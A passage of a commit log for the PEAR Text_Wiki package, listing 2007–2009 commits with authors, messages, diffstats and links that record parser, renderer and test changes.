    removed warning about undefined alt text
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 242129 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Parse/Creole/Image.php | 3 +--
 1 file changed, 1 insertion(+), 2 deletions(-)

http://github.com/horde/horde/commit/2585c5bde28498ff33c77d3c64212c158594aea5

-----------------------------------------------------------------------

commit 3d7002366f02a75824c0168cce32e98ac75346bc
Author: Michele Tomaiuolo 
Date:   Mon Sep 3 22:19:47 2007 +0000

    enclose block-level images in a table
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 242130 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Parse/Creole/Trim.php | 9 +++++++++
 1 file changed, 9 insertions(+)

http://github.com/horde/horde/commit/3d7002366f02a75824c0168cce32e98ac75346bc

-----------------------------------------------------------------------

commit 70b78cc1d1dfe50714e4fbed9467fe58a1f74207
Author: Michele Tomaiuolo 
Date:   Mon Sep 3 22:40:09 2007 +0000

    enclose block-level images in a table
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 242132 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Parse/Creole/Trim.php | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

http://github.com/horde/horde/commit/70b78cc1d1dfe50714e4fbed9467fe58a1f74207

-----------------------------------------------------------------------

commit d1ab13ba44eff4b2d6d111cb15a4f4f967148cb1
Author: Michele Tomaiuolo 
Date:   Mon Sep 3 23:11:59 2007 +0000

    allow tildes in image urls
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 242134 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Creole.php | 2 ++
 1 file changed, 2 insertions(+)

http://github.com/horde/horde/commit/d1ab13ba44eff4b2d6d111cb15a4f4f967148cb1

-----------------------------------------------------------------------

commit 09a2f05f01d6adc6983a580063f266a472d6ee0d
Author: Michele Tomaiuolo 
Date:   Tue Sep 4 19:43:07 2007 +0000

    don't escape alphanum chars, it's not consistent with urls
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 242165 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Creole.php           | 2 --
 Text/Wiki/Parse/Creole/Raw.php | 2 +-
 2 files changed, 1 insertion(+), 3 deletions(-)

http://github.com/horde/horde/commit/09a2f05f01d6adc6983a580063f266a472d6ee0d

-----------------------------------------------------------------------

commit a0d7024463024598770931f1c39dac588adcd886
Author: Michele Tomaiuolo 
Date:   Fri Sep 28 17:14:58 2007 +0000

    *** empty log message ***
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 243077 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Parse/Creole/Table.php | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

http://github.com/horde/horde/commit/a0d7024463024598770931f1c39dac588adcd886

-----------------------------------------------------------------------

commit 498801720fdc12c84d28cbf0153b86c33fd583f0
Author: Michele Tomaiuolo 
Date:   Fri Sep 28 19:35:50 2007 +0000

    using 'empty' to avoid notices
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 243092 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Creole.php | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

http://github.com/horde/horde/commit/498801720fdc12c84d28cbf0153b86c33fd583f0

-----------------------------------------------------------------------

commit 1c4a6b116f1f54feb9b74fa80e33b80161473e4d
Author: Michele Tomaiuolo 
Date:   Fri Sep 28 21:45:05 2007 +0000

    Fixed priority among images urls and tables (about pipe)
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 243103 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Creole.php | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

http://github.com/horde/horde/commit/1c4a6b116f1f54feb9b74fa80e33b80161473e4d

-----------------------------------------------------------------------

commit 5e5a6401a7484add2cb6515ddb695ec635232e49
Author: Michele Tomaiuolo 
Date:   Fri Sep 28 21:46:35 2007 +0000

    Commented out wrapping of images in tables
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 243104 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Parse/Creole/Trim.php | 4 +++-
 1 file changed, 3 insertions(+), 1 deletion(-)

http://github.com/horde/horde/commit/5e5a6401a7484add2cb6515ddb695ec635232e49

-----------------------------------------------------------------------

commit 743b8e3f63e9725809874696fd632e76cb3299a2
Author: Michele Tomaiuolo 
Date:   Fri Sep 28 22:02:50 2007 +0000

    Avoid handling images which include other markup
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 243106 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Parse/Creole/Image.php | 17 ++++++++++-------
 1 file changed, 10 insertions(+), 7 deletions(-)

http://github.com/horde/horde/commit/743b8e3f63e9725809874696fd632e76cb3299a2

-----------------------------------------------------------------------

commit 413c51e60019cc328252adc05f94cbf348dd449d
Author: Justin Patrin 
Date:   Mon Dec 17 16:03:48 2007 +0000

    Bug #12490 change delim to a utf-8 compatible value
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 248433 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki.php | 5 ++---
 1 file changed, 2 insertions(+), 3 deletions(-)

http://github.com/horde/horde/commit/413c51e60019cc328252adc05f94cbf348dd449d

-----------------------------------------------------------------------

commit 0ef6b47f744ce1a8221e5cf6851bfea8a38562b8
Author: Justin Patrin 
Date:   Mon Dec 17 16:12:25 2007 +0000

    Bug #12619 allow any number of spaces before the list items
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 248434 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Parse/Default/List.php | 46 ++++++++++++++++++++++++++--------------
 1 file changed, 30 insertions(+), 16 deletions(-)

http://github.com/horde/horde/commit/0ef6b47f744ce1a8221e5cf6851bfea8a38562b8

-----------------------------------------------------------------------

commit 21ce607014ae3445147be2e52ceacdca0ca7b503
Author: Justin Patrin 
Date:   Mon Dec 17 16:19:44 2007 +0000

    Bug #12580 fix license
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 248435 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Render/Latex/Prefilter.php | 18 ++++++++++++++-
 Text/Wiki/Render/Plain/Prefilter.php | 44 ++++++++++++------------------------
 2 files changed, 31 insertions(+), 31 deletions(-)

http://github.com/horde/horde/commit/21ce607014ae3445147be2e52ceacdca0ca7b503

-----------------------------------------------------------------------

commit 578e94447fd04147c1576103ffc16202618bf8da
Author: Michele Tomaiuolo 
Date:   Mon Mar 3 08:31:44 2008 +0000

    fixed bug preventing urls to be used in tables
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 254098 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Creole.php | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

http://github.com/horde/horde/commit/578e94447fd04147c1576103ffc16202618bf8da

-----------------------------------------------------------------------

commit 61de090783f10c203b1cdd42d4c03307b3e98105
Author: Michele Tomaiuolo 
Date:   Mon Mar 3 09:40:01 2008 +0000

    fixed bug preventing urls to be used in tables
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 254106 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Creole.php | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

http://github.com/horde/horde/commit/61de090783f10c203b1cdd42d4c03307b3e98105

-----------------------------------------------------------------------

commit 55c78bcace3edd9d2eae1a82ea079d9d0e1803bc
Author: Michele Tomaiuolo 
Date:   Tue Jul 22 05:14:50 2008 +0000

    minor - indent
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 263146 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Creole.php | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

http://github.com/horde/horde/commit/55c78bcace3edd9d2eae1a82ea079d9d0e1803bc

-----------------------------------------------------------------------

commit 762e81b445aedaab37c967438cffb01eccb36d73
Author: Michele Tomaiuolo 
Date:   Thu Aug 21 21:37:08 2008 +0000

    bug fix - decimal numbers at beginning of line resulted into numbered list element
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 265249 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Parse/Creole/Trim.php | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

http://github.com/horde/horde/commit/762e81b445aedaab37c967438cffb01eccb36d73

-----------------------------------------------------------------------

commit 8a5c434a15ae447fb0e231f17b291611b145c449
Author: Justin Patrin 
Date:   Sat Oct 25 19:03:18 2008 +0000

    bug #14869 add SKIPIF for mossing config, thanks to daniel
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 267750 c90b9560-bf6c-de11-be94-00142212c4b1

 tests/Cowiki_Render_Url.phpt        | 8 +++++++-
 tests/Creole_Parse_Url.phpt         | 8 +++++++-
 tests/Creole_Render_Url.phpt        | 8 +++++++-
 tests/Default_Parse_BlockQuote.phpt | 8 +++++++-
 tests/Docbook_Render_Url.phpt       | 8 +++++++-
 tests/Doku_Render_Url.phpt          | 8 +++++++-
 tests/Latex_Render_Url.phpt         | 8 +++++++-
 tests/Plain_Render_Url.phpt         | 8 +++++++-
 tests/Tiki_Render_Url.phpt          | 8 +++++++-
 tests/Xhtml_Render_Url.phpt         | 8 +++++++-
 10 files changed, 70 insertions(+), 10 deletions(-)

http://github.com/horde/horde/commit/8a5c434a15ae447fb0e231f17b291611b145c449

-----------------------------------------------------------------------

commit 0b83b96a1a6188798ba194d856da6874ef9c25a6
Author: Justin Patrin 
Date:   Sat Oct 25 19:10:52 2008 +0000

    use an include
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 267751 c90b9560-bf6c-de11-be94-00142212c4b1

 tests/Cowiki_Render_Url.phpt        | 6 +-----
 tests/Creole_Parse_Url.phpt         | 6 +-----
 tests/Creole_Render_Url.phpt        | 6 +-----
 tests/Default_Parse_BlockQuote.phpt | 6 +-----
 tests/Docbook_Render_Url.phpt       | 6 +-----
 tests/Doku_Render_Url.phpt          | 6 +-----
 tests/Latex_Render_Url.phpt         | 6 +-----
 tests/Plain_Render_Url.phpt         | 6 +-----
 tests/Tiki_Render_Url.phpt          | 6 +-----
 tests/Xhtml_Render_Url.phpt         | 6 +-----
 tests/skipif.php                    | 5 +++++
 11 files changed, 15 insertions(+), 50 deletions(-)
 create mode 100644 tests/skipif.php

http://github.com/horde/horde/commit/0b83b96a1a6188798ba194d856da6874ef9c25a6

-----------------------------------------------------------------------

commit 97be725f8bfcd17f9870d1ee2b04af272d25b2a8
Author: Michele Tomaiuolo 
Date:   Fri Jan 16 21:42:27 2009 +0000

    reorganized superscripting of ordinal numbers
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 273661 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Parse/Creole/Superscript.php | 22 +++++++++++-----------
 Text/Wiki/Parse/Creole/Trim.php        |  5 -----
 2 files changed, 11 insertions(+), 16 deletions(-)

http://github.com/horde/horde/commit/97be725f8bfcd17f9870d1ee2b04af272d25b2a8

-----------------------------------------------------------------------

commit 32c82a1e5f31caf108684d5babf5a5d5ca8c5563
Author: Michele Tomaiuolo 
Date:   Thu Jan 22 13:28:32 2009 +0000

    "No linebreaks are allowed within headings." (From specs.)
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 274202 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Creole.php | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

http://github.com/horde/horde/commit/32c82a1e5f31caf108684d5babf5a5d5ca8c5563

-----------------------------------------------------------------------

commit feca7cb2380af8ac7522108e8ca20582ac2c52a9
Author: Moritz Venn 
Date:   Thu Apr 16 14:29:16 2009 +0000

    implement fr#16055 (include brackets in url regex)
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 278840 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Parse/Mediawiki/Url.php | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

http://github.com/horde/horde/commit/feca7cb2380af8ac7522108e8ca20582ac2c52a9

-----------------------------------------------------------------------

commit 1ede0a4d30fa21cac0bb56eed93730f3d1a415df
Author: Moritz Venn 
Date:   Thu Apr 16 15:10:51 2009 +0000

    implement fr#14348: allow width/height for images
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 278841 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Parse/Mediawiki/Wikilink.php | 38 +++++++++++++++++++++-------------
 1 file changed, 24 insertions(+), 14 deletions(-)

http://github.com/horde/horde/commit/1ede0a4d30fa21cac0bb56eed93730f3d1a415df

-----------------------------------------------------------------------

commit 463c91fbf3054476f5efe64c97749d0487b9858d
Author: Moritz Venn 
Date:   Tue Jun 9 10:33:32 2009 +0000

    fix #12825: remove helper code which looks unneeded to me
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 281864 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Parse/Mediawiki/List.php | 16 ----------------
 1 file changed, 16 deletions(-)

http://github.com/horde/horde/commit/463c91fbf3054476f5efe64c97749d0487b9858d

-----------------------------------------------------------------------

commit 4e57c362257db6e86b09b796c948478a23677619
Author: Justin Patrin 
Date:   Tue Jun 9 22:52:19 2009 +0000

    Update wikilink renderers to be backwards-compatible
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 281901 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Render/Doku/Wikilink.php |  8 ++++++--
 Text/Wiki/Render/Tiki/Wikilink.php | 15 +++++++++++----
 2 files changed, 17 insertions(+), 6 deletions(-)

http://github.com/horde/horde/commit/4e57c362257db6e86b09b796c948478a23677619

-----------------------------------------------------------------------

commit 12e29e15f63ab6cfe4eb8d00fceb4352a2a358a8
Author: Justin Patrin 
Date:   Sat Jun 13 00:16:57 2009 +0000

    Fix syntax error
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 282058 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Render/Tiki/Wikilink.php | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

http://github.com/horde/horde/commit/12e29e15f63ab6cfe4eb8d00fceb4352a2a358a8

-----------------------------------------------------------------------

commit c567a00d096ab86e3bb6052eceaa1588a65cbb15
Author: Rodrigo Sampaio Primo 
Date:   Sun Jun 14 02:19:43 2009 +0000

    Bug #9154: token() method for class Text_Wiki_Render_Tiki_Paragraph implemented
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 282096 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Render/Tiki/Paragraph.php | 6 +++++-
 1 file changed, 5 insertions(+), 1 deletion(-)

http://github.com/horde/horde/commit/c567a00d096ab86e3bb6052eceaa1588a65cbb15

-----------------------------------------------------------------------

commit ec71a571374afae9044a969cd63f5b5436f89b33
Author: Rodrigo Sampaio Primo 
Date:   Sun Jun 14 02:31:24 2009 +0000

    Bug #16322: properly url rendering
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 282097 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Render/Tiki/Url.php | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

http://github.com/horde/horde/commit/ec71a571374afae9044a969cd63f5b5436f89b33

-----------------------------------------------------------------------

commit 9f0c82bfc41cd3fa3d2cb07fcffbe580d562d3c4
Author: Rodrigo Sampaio Primo 
Date:   Sun Jun 14 02:41:18 2009 +0000

    Feature request #16315: class Text_Wiki_Render_Tiki_Preformatted implemented
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 282098 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Render/Tiki/Preformatted.php | 48 ++++++++++++++++++++++++++++++++++
 1 file changed, 48 insertions(+)
 create mode 100644 Text/Wiki/Render/Tiki/Preformatted.php

http://github.com/horde/horde/commit/9f0c82bfc41cd3fa3d2cb07fcffbe580d562d3c4

-----------------------------------------------------------------------

commit b2bba4d97bcfdad3d079e27c0062d77e73265f37
Author: Rodrigo Sampaio Primo 
Date:   Mon Jun 15 17:00:04 2009 +0000

    add Creole to the list of parsers and renders
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 282174 c90b9560-bf6c-de11-be94-00142212c4b1

 doc/test_Text_Wiki.php | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

http://github.com/horde/horde/commit/b2bba4d97bcfdad3d079e27c0062d77e73265f37

-----------------------------------------------------------------------

commit 81c7cb6e3990bf5522bef2c346f0f4c7612aaa71
Author: Rodrigo Sampaio Primo 
Date:   Mon Jun 15 17:20:14 2009 +0000

    add new tests using PHPUnit
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 282175 c90b9560-bf6c-de11-be94-00142212c4b1

 tests/Tiki_Parser_Test.php | 35 ++++++++++++++++++++++
 tests/Tiki_Render_Test.php | 73 ++++++++++++++++++++++++++++++++++++++++++++++
 tests/tests.php            | 26 +++++++++++++++++
 3 files changed, 134 insertions(+)
 create mode 100644 tests/Tiki_Parser_Test.php
 create mode 100644 tests/Tiki_Render_Test.php
 create mode 100644 tests/tests.php

http://github.com/horde/horde/commit/81c7cb6e3990bf5522bef2c346f0f4c7612aaa71

-----------------------------------------------------------------------

commit bc2640b522056b4a05587c04bb2976fb80fd8c03
Author: Rodrigo Sampaio Primo 
Date:   Mon Jun 15 20:01:55 2009 +0000

    Properly rendering of Tiki heading
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 282186 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Render/Tiki/Heading.php | 8 +++++---
 1 file changed, 5 insertions(+), 3 deletions(-)

http://github.com/horde/horde/commit/bc2640b522056b4a05587c04bb2976fb80fd8c03

-----------------------------------------------------------------------

commit 2ef154f936f9ea4eca8a29ee30d04efcdd35f0a2
Author: Rodrigo Sampaio Primo 
Date:   Tue Jun 16 03:06:06 2009 +0000

    Warning message about the need of magic_quotes_gpc = Off
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 282202 c90b9560-bf6c-de11-be94-00142212c4b1

 doc/test_Text_Wiki.php | 4 ++++
 1 file changed, 4 insertions(+)

http://github.com/horde/horde/commit/2ef154f936f9ea4eca8a29ee30d04efcdd35f0a2

-----------------------------------------------------------------------

commit 566626dba96f05497dfe1cbb3ea9e2be5f436e8e
Author: Rodrigo Sampaio Primo 
Date:   Tue Jun 16 03:20:13 2009 +0000

    Text_Wiki_Render_Tiki_Image can render images without additional parameters
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 282203 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Render/Tiki/Image.php | 6 ++++--
 1 file changed, 4 insertions(+), 2 deletions(-)

http://github.com/horde/horde/commit/566626dba96f05497dfe1cbb3ea9e2be5f436e8e

-----------------------------------------------------------------------

commit 372937b74dbb75fead174549440848ac107f60d5
Author: Rodrigo Sampaio Primo 
Date:   Tue Jun 16 04:56:54 2009 +0000

    Added tests for all Tiki Render rules
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 282204 c90b9560-bf6c-de11-be94-00142212c4b1

 tests/Tiki_Render_Test.php | 727 +++++++++++++++++++++++++++++++++++++++++++--
 tests/tests.php            |   4 +-
 2 files changed, 698 insertions(+), 33 deletions(-)

http://github.com/horde/horde/commit/372937b74dbb75fead174549440848ac107f60d5

-----------------------------------------------------------------------

commit 4318cf1e34d80c12d2046e077e9812449a737d06
Author: Rodrigo Sampaio Primo 
Date:   Tue Jun 16 18:18:39 2009 +0000

    Fix Text_Wiki_Render_Tiki_Code
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 282258 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Render/Tiki/Code.php | 2 +-
 tests/Tiki_Render_Test.php     | 7 ++++---
 2 files changed, 5 insertions(+), 4 deletions(-)

http://github.com/horde/horde/commit/4318cf1e34d80c12d2046e077e9812449a737d06

-----------------------------------------------------------------------

commit 71a18d42ab1d393ce476475c25558c531da3c25e
Author: Rodrigo Sampaio Primo 
Date:   Tue Jun 16 22:00:39 2009 +0000

    Renaming tests files
    Add Text_Wiki_Parse_Mediawiki tests file
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 282272 c90b9560-bf6c-de11-be94-00142212c4b1

 tests/Text_Wiki_Parse_Mediawiki_Tests.php | 103 +++++
 tests/Text_Wiki_Parse_Tiki_Tests.php      |  35 ++
 tests/Text_Wiki_Render_Tiki_Tests.php     | 663 +++++++++++++++++++++++++++
 tests/Tiki_Parser_Test.php                |  35 --
 tests/Tiki_Render_Test.php                | 739 ------------------------------
 tests/mediawiki_syntax.txt                |  79 ++++
 tests/tests.php                           |  10 +-
 7 files changed, 886 insertions(+), 778 deletions(-)
 create mode 100644 tests/Text_Wiki_Parse_Mediawiki_Tests.php
 create mode 100644 tests/Text_Wiki_Parse_Tiki_Tests.php
 create mode 100644 tests/Text_Wiki_Render_Tiki_Tests.php
 delete mode 100644 tests/Tiki_Parser_Test.php
 delete mode 100644 tests/Tiki_Render_Test.php
 create mode 100644 tests/mediawiki_syntax.txt

http://github.com/horde/horde/commit/71a18d42ab1d393ce476475c25558c531da3c25e

-----------------------------------------------------------------------

commit fbb77f1f91bbd67e4362d2aab6e9d0102ea2328e
Author: Rodrigo Sampaio Primo 
Date:   Tue Jun 16 22:01:34 2009 +0000

    Fix: = heading = is a valid MediaWiki syntax
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 282273 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Parse/Mediawiki/Heading.php | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

http://github.com/horde/horde/commit/fbb77f1f91bbd67e4362d2aab6e9d0102ea2328e

-----------------------------------------------------------------------

commit f493c45cf577283c2983a3737ff18b6fd4e5b19e
Author: Rodrigo Sampaio Primo 
Date:   Thu Jun 18 02:25:27 2009 +0000

    adding files to .cvsignore
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 282351 c90b9560-bf6c-de11-be94-00142212c4b1

http://github.com/horde/horde/commit/f493c45cf577283c2983a3737ff18b6fd4e5b19e

-----------------------------------------------------------------------

commit c967b529f0e68b82676f2563301fab07b47225d0
Author: Rodrigo Sampaio Primo 
Date:   Thu Jun 18 02:30:18 2009 +0000

    Adding first tests to Text_Wiki class
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 282352 c90b9560-bf6c-de11-be94-00142212c4b1

 tests/Text_Wiki_Tests.php | 370 ++++++++++++++++++++++++++++++++++++++++++++++
 tests/tests.php           |   4 +-
 2 files changed, 373 insertions(+), 1 deletion(-)
 create mode 100644 tests/Text_Wiki_Tests.php

http://github.com/horde/horde/commit/c967b529f0e68b82676f2563301fab07b47225d0

-----------------------------------------------------------------------

commit c8dd8f0eaa2abdc678584d81cf41186e34d9f0dc
Author: Rodrigo Sampaio Primo 
Date:   Thu Jun 18 19:17:07 2009 +0000

    Fix specific case of Tiki rendering of wikilinks
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 282383 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Render/Tiki/Wikilink.php    | 2 +-
 tests/Text_Wiki_Render_Tiki_Tests.php | 4 ++++
 2 files changed, 5 insertions(+), 1 deletion(-)

http://github.com/horde/horde/commit/c8dd8f0eaa2abdc678584d81cf41186e34d9f0dc

-----------------------------------------------------------------------

commit ffa1cd3f26c1493f9097d57648c248b55e70f917
Author: Rodrigo Sampaio Primo 
Date:   Fri Jun 19 18:00:07 2009 +0000

    More tests to Text_Wiki_Parse_Mediawiki
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 282448 c90b9560-bf6c-de11-be94-00142212c4b1

 tests/Text_Wiki_Parse_Mediawiki_Tests.php | 51 +++++++++++++++++++++++++------
 1 file changed, 41 insertions(+), 10 deletions(-)

http://github.com/horde/horde/commit/ffa1cd3f26c1493f9097d57648c248b55e70f917

-----------------------------------------------------------------------

commit bfa510398f0d1e145da9fbc76d24d1223be65ee9
Author: Rodrigo Sampaio Primo 
Date:   Fri Jun 19 18:02:58 2009 +0000

    Removing unnecessary tearDown() method from test class
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 282449 c90b9560-bf6c-de11-be94-00142212c4b1

 tests/Text_Wiki_Parse_Mediawiki_Tests.php | 6 ------
 1 file changed, 6 deletions(-)

http://github.com/horde/horde/commit/bfa510398f0d1e145da9fbc76d24d1223be65ee9

-----------------------------------------------------------------------

commit bb3289147ed2dcdd5030dcb15110d649a2c3247c
Author: Rodrigo Sampaio Primo 
Date:   Fri Jun 19 20:56:40 2009 +0000

    More tests for Text_Wiki
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 282451 c90b9560-bf6c-de11-be94-00142212c4b1

 tests/Text_Wiki_Tests.php | 352 ++++++++++++++++++++++++++++++----------------
 1 file changed, 230 insertions(+), 122 deletions(-)

http://github.com/horde/horde/commit/bb3289147ed2dcdd5030dcb15110d649a2c3247c

-----------------------------------------------------------------------

commit 99df69d5821cb2373e1a8226c2f54972d6886ab1
Author: Rodrigo Sampaio Primo 
Date:   Fri Jun 19 22:33:47 2009 +0000

    Adding tests for the Text_Wiki_Render class
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 282457 c90b9560-bf6c-de11-be94-00142212c4b1

 tests/Text_Wiki_Render_Tests.php | 98 ++++++++++++++++++++++++++++++++++++++++
 tests/tests.php                  |  2 +
 2 files changed, 100 insertions(+)
 create mode 100644 tests/Text_Wiki_Render_Tests.php

http://github.com/horde/horde/commit/99df69d5821cb2373e1a8226c2f54972d6886ab1

-----------------------------------------------------------------------

commit 3cd28471aa1ff2ffd8dab4176b70f9c8cc2c6c4d
Author: Rodrigo Sampaio Primo 
Date:   Fri Jul 3 17:24:06 2009 +0000

    Fix tiki definition list render
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 283428 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Render/Tiki/Deflist.php     |  2 +-
 tests/Text_Wiki_Render_Tiki_Tests.php | 17 ++++++++++++++++-
 2 files changed, 17 insertions(+), 2 deletions(-)

http://github.com/horde/horde/commit/3cd28471aa1ff2ffd8dab4176b70f9c8cc2c6c4d

-----------------------------------------------------------------------

commit 991172daac18e49b631d147c15e91a56d5343947
Author: Rodrigo Sampaio Primo 
Date:   Fri Jul 3 17:40:05 2009 +0000

    Implemented one more Text_Wiki_Render_Tiki test
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 283432 c90b9560-bf6c-de11-be94-00142212c4b1

 tests/Text_Wiki_Render_Tiki_Tests.php | 20 ++++++++++----------
 1 file changed, 10 insertions(+), 10 deletions(-)

http://github.com/horde/horde/commit/991172daac18e49b631d147c15e91a56d5343947

-----------------------------------------------------------------------

commit 4c0b4aeeab55ace89fec921b3e39860eda6f6c4d
Author: Rodrigo Sampaio Primo 
Date:   Sat Jul 4 17:56:19 2009 +0000

    Two more tests to Text_Wiki core class
    New directory for tests fixtures
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 283480 c90b9560-bf6c-de11-be94-00142212c4b1

 tests/Text_Wiki_Parse_Mediawiki_Tests.php          |  4 +-
 tests/Text_Wiki_Tests.php                          | 52 ++++++++++----
 tests/fixtures/mediawiki_syntax.txt                | 80 ++++++++++++++++++++++
 .../fixtures/text_wiki_sample_mediawiki_syntax.txt | 66 ++++++++++++++++++
 ...ext_wiki_sample_syntax_transformed_to_plain.txt | 64 +++++++++++++++++
 ...xt_wiki_sample_syntax_transformed_to_plain2.txt | 64 +++++++++++++++++
 ...ext_wiki_sample_syntax_transformed_to_xhtml.txt | 70 +++++++++++++++++++
 7 files changed, 386 insertions(+), 14 deletions(-)
 create mode 100644 tests/fixtures/mediawiki_syntax.txt
 create mode 100644 tests/fixtures/text_wiki_sample_mediawiki_syntax.txt
 create mode 100644 tests/fixtures/text_wiki_sample_syntax_transformed_to_plain.txt
 create mode 100644 tests/fixtures/text_wiki_sample_syntax_transformed_to_plain2.txt
 create mode 100644 tests/fixtures/text_wiki_sample_syntax_transformed_to_xhtml.txt

http://github.com/horde/horde/commit/4c0b4aeeab55ace89fec921b3e39860eda6f6c4d

-----------------------------------------------------------------------

commit 7ff9f63988f64c83fe856123b959c3f933e2040a
Author: Gwynne Raskind 
Date:   Mon Jul 13 12:15:13 2009 +0000

    fix a huge number of wrong MIME types. UGH.
    
